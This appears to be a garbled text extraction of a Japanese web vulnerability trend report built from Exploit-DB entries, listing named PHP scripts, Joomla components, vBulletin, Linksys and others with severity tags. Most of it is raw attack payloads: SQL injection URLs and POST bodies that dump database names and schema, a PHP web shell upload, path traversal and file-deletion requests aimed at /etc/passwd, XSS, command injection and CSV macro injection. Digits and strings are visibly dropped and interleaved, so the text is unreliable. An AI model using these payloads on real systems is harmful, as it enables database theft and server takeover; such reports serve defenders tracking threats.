中早急対応要 Kickstarter Clone Acript.0 - 'projid' Secure E-commerce Script.0. - 'searchcat' / 'searchmain' /investcalc.php?price=&projid=%0and%0=-- Kickstarter Clone Acript Kickstarter Clone Acript.0 /category.php?searchmain='++/*!50000union*/+/*!50000 SELECT*/+,version(),,4,5,6,7,8,9,0,,,,4,5,6,7, Secure E-commerce Script Secure E-commerce Script.0. 8, SQL Injection 中早急対応要 Laundry Booking Script.0 - 'list?city' /laundry-search/list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Laundry Booking Script Laundry Booking Script.0 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,5 0,5,5,5--+-&main_search= SQL Injection 中早急対応要 Lawyer Search Script. - 'lawyer-list?city' /lawyer-list?city=- '+/*!UNION*/+/*!SELECT*/+,,,4,5,6,7,8,9, 0,,,,4,5,6,7,8,9,0,,,,CONCAT_WS(0x Lawyer Search Script Lawyer Search Script. 0a0,USER(),DATABASE(),VERSION()),5,6,7,8,9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,48,49,5 0,5,5--+-&main_search= SQL Injection 中早急対応要 Multivendor Penny Auction Clone Script.0 /bidding/detail/- 48++UNION(SELECT(),(),(),(4),(5),(6),(7),CONCAT_WS(0x Multivendor Penny Auction 0a0,USER(),DATABASE(),VERSION()),(9),(0),(),(),( Clone Script ),(4),(5),(6),(7),(8),(9),(0),(),(),(),(4),(5),(6 ),(7),(8),(9))-- Multivendor Penny Auction Clone Script SQL Injection 中早急対応要 Online Exam Test Application Script.6 - 'exams.php?sort' /exams.php?sort=- 4++UNION+ALL+SELECT+,,,(SELECT(@x)FROM(SELECT(@ x:=0x00),(@nr:=0),(select(0)from(information_schem A.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d6746 Online Exam Test Application Script Online Exam Test Application Script.6 96f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,LPAD (@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67e)) ))x),5, SQL Injection 中早急対応要 Opensource Classified Ads Script. POST /advance_result.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' Opensource Classified Ads Script Opensource Classified Ads Script SQL Injection 中早急対応要 PHP Multivendor Ecommerce.0 - 'sid' / 'searchcat' / 'chid' /single_detail.php?sid= AND 4059=4059 PHP Multivendor Ecommerce PHP Multivendor Ecommerce SQL Injection 中早急対応要 Professional Service Script.0 - 'service-list?city' SQL Injection 中早急対応要 Readymade PHP Classified Script. - 'subctid' / 'mctid' /servicelist?city='+/*!7union*/+/*!7select*/+,,,4,5,6,7,8,9,0,,,,4,5,6,7,8,9,0,,,,concat_ Professional Service Script Professional Service Script.0 WS(0x0a0,USER(),DATABASE(),VERSION()),5,6,7,8, 9,0,,,,4,5,6,7,8,9,40,4,4,4,44,45,46,47,4 8,49,50,5,5--+-&main_search= /categories?&mctid=- Yh788'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELEC T(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCH EMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,L PAD(@NR:=@NR%b,4,0x0),0xa0,table_name,0xc67 e))))x)-- Readymade PHP Classified Script Readymade PHP Classified Script SQL Injection 中早急対応要 Readymade Video Sharing Script. /single-video-detail.php?video_id=mtmy&report_videos[]=' AND ELT(7764=7764,974) AND 'BZFh'='BZFh&report_submit= Readymade Video Sharing Script Readymade Video Sharing Script SQL Injection 易早急対応要 Responsive Realestate Script. - 'property-list?tbud' /property-list?tbud= AND 479=479&quicksrch= Responsive Realestate Script Responsive Realestate Script.

7 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 中早急対応要 Multireligion Responsive Matrimonial 'succid' /success-story.php?succid=- 6++/*!0UNION*/(/*!0SELECT*/+0x89,0x8 9,0x89,0x849,0x859,0x869,0x879,0 x889,(/*!0select*/+export_set(5,@:=0,(/*!0sel ect*/+count(*)/*!0from*/(information_schema.columns) Multireligion Responsive Matrimonial Multireligion Responsive Matrimonial 4.7. where@:=export_set(5,export_set(5,@,/*!0table_name* /,0xc6c69e,),/*!0column_name*/,0xaa,)),@,)),0x 809,0x89,0x89,0x89,0x84 9,0x859,0x869,0x879,0x889,0x 899) SQL Injection 中早急対応要 Responsive Events & Movie Ticket Booking Script.. - 'findcity.php?q' /findcity.php?q=s'+/*!0union*/+/*!0select*/+0x,0x,0x,(/*!0select*/+export_set(5,@:=0,(/*!0 select*/+count(*)/*!0from*/(information_schema.colu Responsive Events & Movie mns)where@:=export_set(5,export_set(5,@,/*!0table_na Ticket Booking Script me*/,0xc6c69e,),/*!0column_name*/,0xaa,)),@, )),0x5,0x6,0x7,0x8,0x9,0x0,0x,0x,0x,0x4,0x5,0x6,0x7,0x8,0x9,0x0-- Responsive Events & Movie Ticket Booking Script SQL Injection 中早急対応要 Multiplex Movie Theater Booking Script..5 - 'moid' / 'eid' /show-time.php?moid=- 0'++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)F ROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NA Multiplex Movie ME=0x746966b65745f6646d696e)AND(0x00)IN(@x:=con Theater Booking Script cat(@x,concat(lpad(@nr:=@nr+,,0x0),0xa0,column _name,0xc67e)))))x),(),(4),(5),(6),(7),(8),(9),( 0),(),(),())-- Multiplex Movie Theater Booking Script SQL Injection 中早急対応要 Single Theater Booking Script.. - 'findcity.php?q' SQL Injection 中早急対応要 Advanced Real Estate Script /findcity.php?q=s'++/*!0union*/+/*!0select*/+,,,(/*!0select*/+export_set(5,@:=0,(/*!0select* /+count(*)/*!0from*/(information_schema.columns)wh ere@:=export_set(5,export_set(5,@,/*!0table_name*/,0x c6c69e,),/*!0column_name*/,0xaa,)),@,)),5--+- Single Theater Booking Script Single Theater Booking Script.. /search-results.php?projectmain=- '++UNION(SELECT(),(),(),(4),(5),(6),(7),(8),(9),(0),(),( ),(),(4),(5),(6),(/*!0Select*/+export_set(5,@:=0, (/*!0select*/+count(*)/*!0from*/(information_sch ema.columns)where@:=export_set(5,export_set(5,@,/*!0 table_name*/,0xc6c69e,),/*!0column_name*/,0xa a,)),@,)),(8),(9),(0),(),(),(),(4),(5),(6),(7),( 8),(9),(0),(),(),(),(4),(5),(6),(7),(8),(9),(40),(4 ),(4),(4),(44),(45),(46),(47),(48),(49))--+-&search= Advanced Real Estate Script Advanced Real Estate Script SQL Injection 中早急対応要 Entrepreneur Bus Booking Script 'sourcebus' /booker_details.php?sourcebus=- ++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select* /+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999fro Entrepreneur Bus Booking Script Entrepreneur Bus Booking Script.0.4 m*/(information_schema.columns)where@:=export_set(5,exp ort_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!09999c olumn_name*/,0xaa,)),@,)) SQL Injection 中早急対応要 MLM Forex Market Plan Script 'newid' / 'eventid' /news_detail.php?newid=- 7'++/*!06666UNION*/(/*!06666SELECT*/+0x89,0x494 MLM Forex Market Plan Script MLM Forex Market Plan Script.0.4 n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 06666table_name*/,0xc6c69e,),/*!06666column_name* /,0xaa,)),@,)),0x849,0x859,0x869) SQL Injection 中早急対応要 MLM Forced Matrix 'newid' /news-detail.php?newid=- 7'++/*!00008UNION*/(/*!00008SELECT*/+0x89,0x494 MLM Forced Matrix MLM Forced Matrix.0.9 n_schema.columns)where@:=export_set(5,export_set(5,@,/*! 00008table_name*/,0xc6c69e,),/*!00008column_name* /,0xaa,)),@,)),0x849,0x859,0x869) SQL Injection 中早急対応要 Car Rental Script 'val' /countrycode.php?val=- '++/*!07777UNION*/+/*!07777SELECT*/+@@version--+- Car Rental Script Car Rental Script SQL Injection 中早急対応要 Groupon Clone Script.0 - 'state_id' / 'search' /city_ajax.php?state_id=- '++/*!09999UNION*/+/*!09999SELECT*/+0x,(/*!09999 Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09 Groupon Clone Script Groupon Clone Script.0 999from*/(information_schema.columns)where@:=export_set (5,export_set(5,@,/*!09999table_name*/,0xc6c69e,),/*!0 9999column_name*/,0xaa,)),@,)) SQL Injection 中早急対応要 Muslim Matrimonial Script.0 - 'succid' /success-story.php?succid=- MA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f76d f6e5f d6)AND(0x00)IN(@x:=CONCAT(@x,LP AD(@NR:=@NR+,4,0x0),0xa0,table_name,0xc67e)) ))x),0x,0x,0x,0x4,0x5,0x6,0x7, 0x8,0x9--+- Muslim Matrimonial Script Muslim Matrimonial Script SQL Injection 易早急対応要 Advanced World Database.0.5 /state.php?country=russian Federation' AND 69=69 AND 'kvcm'='kvcm&state=moskva Advanced World Database Advanced World Database SQL Injection 中早急対応要 Resume Clone Script.0.5 /preview.php?id=- ++/*!08888UNION*/(/*!08888SELECT*/+0x89,0x8 9,0x89,0x849,0x859,0x869,0x879,0x Resume Clone Script Resume Clone Script ,0x899,CONCAT_WS(0x0a0,USER(),DATABAS E(),VERSION()),0x89,0x89,0x89,0x8 49) SQL Injection 中早急対応要 Basic Job Site Script.0.5 POST /onlinejobsearch/job HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keyword='and (select from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND ''=' Basic Job Site Script Basic Job Site Script SQL Injection 中早急対応要 Vanguard.4 /p/'++/*!50000union*/+/*!50000select*/+%c(/*!0888 8Select*/+export_set(5%c@:=0%c(/*!08888select*/+coun t(*)/*!08888from*/(information_schema.columns)where@:=e xport_set(5%cexport_set(5%c@%c/*!08888table_name* /%c0xc6c69e%c)%c/*!08888column_name*/%c0x Vanguard Vanguard.4 aa%c))%c@%c))%c%c4%c5%c6%c7%c8 %c9%c0%c%c%c%c4%c5%c6%c 7%c8%c9%c0%c%c%c%c4%c5 %c6%c7%c8%c9%c0%c%c%c SQL Injection 中早急対応要 Joomla! Component JBuildozer.4. - 'appid' /index.php?option=com_jbuildozer&view=entriessearch&tmpl =component&mode=module&tpl=&appid=%0%0%f*!05555procedure*%f%0%f*!05555analyse*%f%0% 8extractvalue(0%c%f*!05555concat*%f%80x7,0x e05656e666e,0xa,@@version%9%9,0% 9%d%d%0%d Joomla! Component Jbuildozer Joomla! Component JBuildozer.4.

8 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です File Upload 易早急対応要 Accesspress Anonymous Post Pro <..0 - Unauthenticated Arbitrary File Upload 脆弱性 POST /wp-admin/adminajax.php?action=ap_file_upload_action&file_uploader_nonce =[nonce]&allowedextensions[]=php&sizelimit=64000 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Content-Disposition: form-data; name="qqfile"; filename="myshell.php" Content-Type: text/php <?php echo shell_exec($_get['e'].' >&');?> Accesspress Anonymous Post Pro Accesspress Anonymous Post Pro < SQL Injection 中早急対応要 Question And Answer..0 /index.php/en/component/jequestions/?view=tags&an=%d VerAyari'%0%f*!06666UNION*%f%0%f*!06666SEL ECT*/%0%c(SELECT%0GROUP_CONCAT(table_name %0SEPARATOR%00xc67e)%0FROM%0INFORMA TION_SCHEMA.TABLES%0WHERE%0TABLE_SCHEMA=DA Question And Answer TABASE())%c%c4%c5%c6%c7%c8%c9%c0% c%c%c%c4%c5%c6%c7%c8%c 9%c0%c%c%c%c4%c5%d%d%0% d Question And Answer SQL Injection 中早急対応要 Video Gallery 'id' /index.php?option=com_jevideogallery&view=category&id=99 %0AND(SELECT%0%0FROM%0(SELECT%0COUNT( *),CONCAT((SELECT(SELECT%0CONCAT(CAST(DATABASE() %0AS%0CHAR)%c0x7e,0x e5656e666e)) %0FROM%0INFORMATION_SCHEMA.TABLES%0WHERE Video Gallery %0table_schema=DATABASE()%0LIMIT%00,),FLOOR(R AND(0)*))x%0FROM%0INFORMATION_SCHEMA.TABLES %0GROUP%0BY%0x)a) Video Gallery Directory Traversal 難早急対応要 vbulletin 5 - 'routestring' Unauthenticated Remote Code Execution 脆弱性 /index.php?routestring=\\..\\..\\..\\..\\..\\..\\.. \\..\\..\\..\\xampp\\apache\\logs\\access.log vbulletin vbulletin Command Injection 難早急対応要 vbulletin 5 - 'cachetemplates' Unauthenticated Remote Arbitrary File Deletion 脆弱性 POST /vb5/ajax/api/template/cachetemplates HTTP/. Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0 0) AppleWebKit/57.6 (KHTML, like Gecko) Chrome/ Safari/57.6 Upgrade-Insecure-Requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/ webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: it-it,it;q=0.8,en-us;q=0.6,en;q=0.4 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 5 templates[]=&templateidlist=o:0:"vb_image_imagemagick" ::{s:0:"%00*%00imagefilelocation";s::"/etc/passwd";} vbulletin vbulletin XSS 易高 Readymade Video Sharing Script. - HTML Injection 脆弱性 /single-videodetail.php?video_id=mtmy&comment=<script>alert(documen Readymade Video Sharing Script Readymade Video Sharing Script. t.cookie);</script>&comment_submit= SQL Injection 中早急対応要 Paid To Read Script 'uid' / 'fnum' / 'fn' /admin/userview.php?uid=- 9++/*!08888UNION*/(/*!08888SELECT*/()%c()%c() %c(4)%c(5)%c(6)%c(7)%c(8)%c(9)%c(0)%c( )%c()%c()%c(4)%c(5)%c(6)%c(7)%c(8) %c(9)%c(0)%c()%c()%c()%c(4)%c(5) %c(6)%c(7)%c(8)%c(9)%c(0)%c()%c() %c()%c(4)%c(5)%c(6)%c(7)%c(8)%c(9) %c(40)%c(4)%c(4)%c(4)%c(44)%c(45)%c(46) Paid To Read Script Paid To Read Script.0.5 %c(47)%c(48)%c(/*!08888select*/+export_set(5%c@: =0%c(/*!08888select*/+count(*)/*!08888from*/(informati on_schema.columns)where@:=export_set(5%cexport_set(5 %c@%c/*!08888table_name*/%c0xc6c69e%c)% c/*!08888column_name*/%c0xaa%c))%c@%c))% c(50)%c(5)%c(5)%c(5)%c(54)%c(55)%c(56)% c(57)%c(58)%c(59)%c(60)%c(6)%c(6)%c(6)% c(64)%c(65)%c(66)%c(67)%c(68)) SQL Injection 中早急対応要 FS Lynda Clone.0 POST /tutorial/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ keywords=' and(select FROM(select count(*),concat((select (select concat(database(),0x7,0x7e,0x e05454e444 e)) FROM information_schema.tables LIMIT 0,),floor(rand(0)*))x FROM information_schema.tables GROUP BY x)a)-- - FS Lynda Clone FS Lynda Clone SQL Injection 中早急対応要 Bus Booking Script.0 - 'txtname' POST /newbusbooking/admin/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ txtname=' UNION ALL SELECT 0x,0x ,0x,0x4,0x5-- Bus Booking Script Bus Booking Script SQL Injection 易早急対応要 Piwigo.9. - 'cat_true' / 'cat_false' POST /admin.php?page=cat_options&section=status HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Piwigo Piwigo.9. cat_false%5b%5d=%0and%0=--&trueify=%c%ab Command Injection 難早急対応要 Linksys WVBR0 - 'User-Agent' Remote Command Injection 脆弱性 GET / HTTP/. User-Agent: "; ls -al "admin Linksys WVBR0 Linksys WVBR Command Injection 難早急対応要 ITGuard-Manager Remote Code Execution 脆弱性 POST /cgi-bin/drknow.cgi?req=login HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ req=login&lang=kor&username= admin 'ls - al' x&password=admin ITGuard-Manager ITGuard-Manager

9 最新 Web 脆弱性トレンドレポート (07.) 07..0~07.. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です SQL Injection 中早急対応要 Movie Guide.0 /index.php?md=%dv'%0%0%f*!0union*%f( %f*!0select*%f%00x58559%c 0x58559%c(%f*!0Select*%f%0 t(*)%f*!0from*%f(information_schema.columns%9 table_name*%f%c0xc6c69e%c)%c%f*!0 Movie Guide Movie Guide %c0x585559%c0x %c0x585759%c0x %c0x585959%c0x %c0x %c0x585559)%d%d%0 %d SQL Injection 中早急対応要 Cells Blog.5 - 'bgid' / 'fmid' / 'fnid' /pub_post.php?bgid=45&fmid=- 7+UNION%0SELECT+0x5%c0x5%c0x5 %c0x54%c0x55%c0x56%c0x57 %c0x58%c%9%c0x550%c0x5 Cells Blog Cells Blog.5 5%c0x55%c0x55%c0x 554%c0x555%c0x556 %c0x557%c0x558%c0x5 59%d%d%0%d SQL Injection 中早急対応要 Joomla! Component JB Visa.0 - 'visatype' /index.php?option=com_bookpro&view=popup&visatype=5 9999%0AND(SELECT%0%0FROM%0(SELECT%0CO UNT(*)%cCONCAT((SELECT(SELECT%0CONCAT(CAST(DA TABASE()%0AS%0CHAR)%c0x7e%c0x e5 Joomla! Component JB Visa Joomla! Component JB Visa.0 656e666e))%0FROM%0INFORMATION_SCHEMA.TABL ES%0WHERE%0table_schema=DATABASE()%0LIMIT% 00%c)%cFLOOR(RAND(0)*))x%0FROM%0INFORMA TION_SCHEMA.TABLES%0GROUP%0BY%0x)a) SQL Injection 中早急対応要 Joomla! Component Guru Pro - 'promocode' /gurubuy?promocode='%0/*!50000procedure*/%0/*!50 000Analyse*/%0(extractvalue(0%c/*!50000concat*/(0x7 Joomla! Component Guru Pro %c0x e05656e666e%c0xa%c@@versio n))%c0)%d%d%00xd Joomla! Component Guru Pro SQL Injection 中早急対応要 Joomla! Component User Bench.0 - 'userid' /index.php?option=com_userbench&view=detail&userid=% 0AND(SELECT%0%0FROM%0(SELECT%0COUNT(*)% cconcat((select(select%0concat(cast(database() %0AS%0CHAR)%c0x7e%c0x e5656e66 Joomla! Component User Bench Joomla! Component User Bench.0 6e))%0FROM%0INFORMATION_SCHEMA.TABLES%0WH ERE%0table_schema=DATABASE()%0LIMIT%00%c)% cfloor(rand(0)*))x%0from%0information_sche MA.TABLES%0GROUP%0BY%0x)a) SQL Injection 中早急対応要 Joomla! Component My Projects.0 /component/myproject/verayari'and%0(select%0%0fro m%0(select%0count(*)%cconcat((select(select%0conca t(cast(database()%0as%0char)%c0x7e))%0from%0inf ormation_schema.tables%0where%0table_schema=datab ase()%0limit%00%c)%cfloor(rand(0)*))x%0from% 0information_schema.tables%0group%0by%0x)a)%0 AND%0''=' Joomla! Component My Projects Joomla! Component My Projects SQL Injection 中早急対応要 Joomla! Component NextGen Editor..0 - 'plname' /index.php?option=com_nge&view=config&plname='and% 0(select%0%0from%0(select%0count(*)%cconcat((s elect(select%0concat(cast(database()%0as%0char)%c0 Joomla! Component x7e))%0from%0information_schema.tables%0where% NextGen Editor 0table_schema=database()%0limit%00%c)%cfloor(ra nd(0)*))x%0from%0information_schema.tables%0grou p%0by%0x)a)%0and%0''=' Joomla! Component NextGen Editor SQL Injection 中早急対応要 BEIMS ContractorWeb POST /CWEBNET/WOSummary/List HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ tradestatus=%0and%0=-- BEIMS ContractorWeb BEIMS ContractorWeb SQL Injection 中早急対応要 FAQ Pro 'id' /index.php?option=com_jefaqpro&view=category&id=+or ++GROUP+BY+CONCAT_WS(0xa,0x e5656e6 66e,VERSION(),FLOOR(RAND(0)*))+HAVING+MIN(0)+OR FAQ Pro +&Itemid=494 FAQ Pro LFI 易中 Biometric Shift Employee Management System.0 - Local File Disclosure 脆弱性 /index.php?user=download?name=verayari.ver&path=../../../../../etc/passwd%00 Biometric Shift Employee Management System Biometric Shift Employee Management System SQL Injection 中早急対応要 Sendroid < /API/index.php?action=compose&username=asdasd%7)% 0OR%0(SELECT%0%0FROM(SELECT%0COUNT(*),CONCAT((<query>),FLOOR(RAND(0)*))x%0FROM%0/*!I Sendroid Sendroid < NFORMATION_SCHEMA*/.PLUGINS%0GROUP%0BY%0x )a)--&api_key=sdsd&sender Command Injection 難早急対応要 Directory Traversal 易中 XSS 易高 SilverStripe CMS.6. - CSV Excel Macro Injection 脆弱性 Xerox DC60 EFI Fiery Controller Webtools.0 - Arbitrary File Disclosure 脆弱性 Easy!Appointments.. - Cross-Site Scripting 脆弱性 POST /SilverStripe/admin/myprofile/EditForm/ HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ FirstName=System+%40SUM(%B)*cmd%7C'+%FC+cal SilverStripe CMS SilverStripe CMS.6. c'!a0&surname=administrator& =demos%40softaculous.com&password%5b_currentpassword%5d=&password%5b _Password%5D=&Password%5B_ConfirmPassword%5D=&P assword%5b_passwordfieldvisible%5d=&locale=en_us&fail edlogincount=0&directgroups%5b%5d=&classname=silv erstripe%5csecurity%5cmember&securityid=fbdb5074d 8c554bf559904a4c60&ID=&action_save=&Ba ckurl=https%a%f%fdemos.softaculous.com%fsilver Stripe%Fadmin%Fmyprofile /wt/forcesave.php?file=/etc/passwd service_id="><script>alert()</script>&provider_id=8 5 Xerox DC60 EFI Fiery Controller Webtools Xerox DC60 EFI Fiery Controller Webtools.0 POST /easyappointments/index.php/appointments/ajax_get_ava ilable_hours HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Easy!Appointments Easy!Appointments Directory Traversal 易高 DotNetNuke DreamSlider Arbitrary File Download 脆弱性 /DesktopModules/DreamSlider/DownloadProvider.aspx?File=/..\..\..\..\..\..\winnt\win.ini DotNetNuke DreamSlider DotNetNuke DreamSlider SQL Injection 中早急対応要 PHP Melody.7. - 'playlist' /ajax.php?p=video&do=getplayer&vid=randomid&aid=&play er=detail&playlist='+(select*from(select(sleep(0)))a)+' PHP Melody PHP Melody.7.